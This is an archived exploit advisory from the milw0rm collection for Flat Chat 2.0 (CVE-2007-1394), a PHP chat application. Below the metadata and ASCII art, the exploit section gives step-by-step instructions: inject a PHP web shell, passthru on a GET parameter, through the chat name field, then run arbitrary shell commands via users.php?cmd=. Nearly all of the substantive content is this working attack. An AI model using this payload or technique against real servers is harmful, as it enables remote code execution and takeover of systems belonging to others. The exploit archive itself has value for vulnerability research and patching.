Flat Chat 2.0 - 'include online.txt' Remote Code Execution
Author: Dj7xpl
type: webapps
platform: php
port:
date_added: 2007-03-06
date_updated:
verified: 1
codes: OSVDB-33890;CVE-2007-1394
tags:
aliases:
screenshot_url:
application_url:
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ /
(@
+_______________________________________________________________________________________________________________________+
+
+
+ +=============================================+
+ | |
+ | Portal : Flat Chat |
+ | Version : 2.0 |
+ | Author : Dj7xpl | Dj7xpl@yahoo.com |
+ | Download : Http://www.undoweb.frih.net |
+ | Risk : High (Remote Code Execution) |
+ | |
+ +=============================================+
+
+ Exploit :
+ Http://localhost/flatchat/index.php <<<<<< Open Index Page
+
+ Insert This Script In Chat Name: e.g: <?php passthru($_GET[cmd]); ?>
+
+ Http://localhost/flatchat/users.php?cmd=ls -la <<< Enter Your Command
+
+_______________________________________________________________________________________________________________________+
# milw0rm.com [2007-03-07]